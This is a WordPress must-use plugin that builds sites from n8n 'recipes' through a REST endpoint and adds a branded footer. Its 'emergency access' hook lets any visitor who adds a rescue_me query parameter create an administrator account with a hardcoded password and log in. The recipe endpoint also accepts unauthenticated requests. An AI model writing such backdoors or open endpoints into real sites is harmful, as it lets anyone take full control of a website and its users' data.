<?php
/* Plugin Name: PressPilot Orchestrator */

// 1. EMERGENCY ACCESS (Always keeps a door open for the owner) 
add_action('init', function () {
    if (isset($_GET['rescue_me'])) {
        $user = get_user_by('login', 'presspilot_admin');
        if (!$user) {
            $uid = wp_create_user('presspilot_admin', 'DesignFirst2025!', 'admin@presspilotapp.com');
            $user = new WP_User($uid);
        }
        $user->set_role('administrator');
        wp_set_auth_cookie($user->ID);
        wp_redirect(admin_url());
        exit;
    }
});

// 2. THE OVEN API (Receives n8n Recipes) 
add_action('rest_api_init', function () {
    register_rest_route('presspilot/v1', '/bake', [
        'methods' => 'POST',
        'callback' => 'presspilot_bake_handler',
        'permission_callback' => '__return_true',
    ]);
});

function presspilot_bake_handler($request)
{
    // 1. locate the Assembler
    // We are in /mu-plugins/presspilot-orchestrator.php.
    // We need to find where the main plugin is installed.
    // It's usually in /plugins/presspilot-agent-plugin-v6.3/ or similar.

    $plugin_dir = WP_PLUGIN_DIR . '/presspilot-agent-plugin-v6.3';

    // Fallback: Check if we are in local dev "4 Antigravity" structure
    if (!file_exists($plugin_dir)) {
        $root_dir = dirname(__DIR__);
        $plugin_dir = $root_dir . '/4 Antigravity/presspilot-agent-plugin-v6.3';
    }

    $assembler_path = $plugin_dir . '/modules/site-assembler.php';

    if (!file_exists($assembler_path)) {
        return new WP_Error('missing_component', 'Assembler logic not found at path: ' . $assembler_path, ['status' => 500]);
    }

    require_once $assembler_path;

    if (!class_exists('PressPilot_Site_Assembler')) {
        return new WP_Error('class_missing', 'PressPilot_Site_Assembler class could not be loaded.', ['status' => 500]);
    }

    // 2. Extract Recipe
    $recipe = $request->get_json_params();

    $business_name = $recipe['business_name'] ?? $recipe['site_title'] ?? 'My New Site';
    $business_tagline = $recipe['tagline'] ?? 'Generated by PressPilot';
    $business_type = $recipe['business_type'] ?? 'corporate';
    $colors = $recipe['colors'] ?? ['primary' => '#0073aa', 'secondary' => '#111111'];
    // Default theme structure if not passed
    $theme = $recipe['theme'] ?? ['slug' => 'ollie'];

    // Handle Content (Assembler expects specific array keys)
    $content = $recipe['content'] ?? [];
    $default_sections = ['home', 'about', 'services', 'contact', 'blog', 'shop', 'cart'];
    foreach ($default_sections as $sec) {
        if (!isset($content[$sec])) {
            $content[$sec] = []; // Empty array triggers default content generation in Assembler
        }
    }

    // 3. Bake the Site
    try {
        $assembler = new PressPilot_Site_Assembler();
        $site_data = $assembler->assemble(
            $business_name,
            $theme,
            $content,
            $colors,
            $business_type,
            $recipe['logo_url'] ?? '',
            $business_tagline
        );

        return $site_data; // Returns { status, pages, preview_url, ... }

    } catch (Exception $e) {
        return new WP_Error('assembly_failed', $e->getMessage(), ['status' => 500]);
    }
}

// 3. UNIVERSAL THEME MATCHER (Ensures optimal theme is active)
// add_action('after_setup_theme', function () {
//     // For now, enforcing Ollie as the Universal Standard
//     if (get_option('template') !== 'ollie') {
//         switch_theme('ollie');
//     }
// });

// 4. GLOBAL FOOTER HOOK (Branding Injection)
add_action('wp_footer', function () {
    echo '<div style="text-align:center; padding: 20px; font-size: 12px; color: #888; background: #fafafa; border-top: 1px solid #eaeaea;">
        Powered by PressPilot Universal Factory
    </div>';
}, 999);
